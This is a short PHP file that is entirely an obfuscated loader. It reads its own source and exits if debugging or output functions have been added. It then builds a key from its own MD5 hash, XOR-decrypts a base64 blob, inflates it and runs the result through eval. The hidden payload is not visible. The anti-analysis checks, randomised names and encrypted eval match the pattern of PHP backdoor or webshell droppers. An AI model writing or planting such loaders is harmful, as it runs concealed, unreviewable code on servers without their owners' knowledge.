<?php
$ixuktrxyuuki="8c30c6e7d45d92d6007e3bb9fdffaf85";
$iewhhxjc="08540509055354045d50565c0c53540700085154060106010753535654070851";
$bibevw="/biLd6U1PbZmoelofmbKMXQ5lxKEU7WJjNfpqC7quxdVDD4wk7iIOuC8A9FT/EMVT6eGCmylJEj2xNRRJbYRQWIM2rt07OQjK/6iBZ8DSIIn0j4YzSxpzIgT6GQuTOFz1IZ7JYYQpdMFbAuhpT9ee+UrKFbAX2Ck21y9tVX6yxjL9h9YwsOzHmUcrE5A0nTKBU+NUrzI8fVeLWJUbNQTw74SANRkMlzZe6A9+9x2dBVPfKGod6ojLbkoktFcUOxdhr7466kDhUzgWcKuegZZJleM2ehIYA==";
$pkzthcll=file_get_contents(__FILE__);
$kbtngjadwkxs=str_replace($bibevw,"",$pkzthcll);
if(strpos($kbtngjadwkxs,"ec"."ho")!==false||strpos($kbtngjadwkxs,"pr"."int")!==false||strpos($kbtngjadwkxs,"var_"."dump")!==false||strpos($kbtngjadwkxs,"file_put_"."contents")!==false||strpos($kbtngjadwkxs,"fw"."rite")!==false){die();}
$lafjyzgr=str_replace(array($ixuktrxyuuki,$iewhhxjc),array("SP_ba32121b","KP_c9907d1f"),$pkzthcll);
$clarpwyfmfxk=md5($lafjyzgr);
$annnpszdsbak=hex2bin($iewhhxjc);
$izksuazbaod="";
$ojuvpf=strlen($clarpwyfmfxk);
for($nivtavqn=0;$nivtavqn<$ojuvpf;$nivtavqn++){
    $izksuazbaod.=chr(ord($annnpszdsbak[$nivtavqn])^ord($clarpwyfmfxk[$nivtavqn]));
}
$yixdkgrsu=base64_decode($bibevw);
$mkxkykruz=strlen($yixdkgrsu);
$cayxgrsqcu="";
$nqodwjywykx=strlen($izksuazbaod);
for($nivtavqn=0;$nivtavqn<$mkxkykruz;$nivtavqn++){
    $cayxgrsqcu.=$yixdkgrsu[$nivtavqn]^$izksuazbaod[$nivtavqn%$nqodwjywykx];
}
$krhhzxllr="gz"."in"."fl"."ate";
eval($krhhzxllr($cayxgrsqcu));
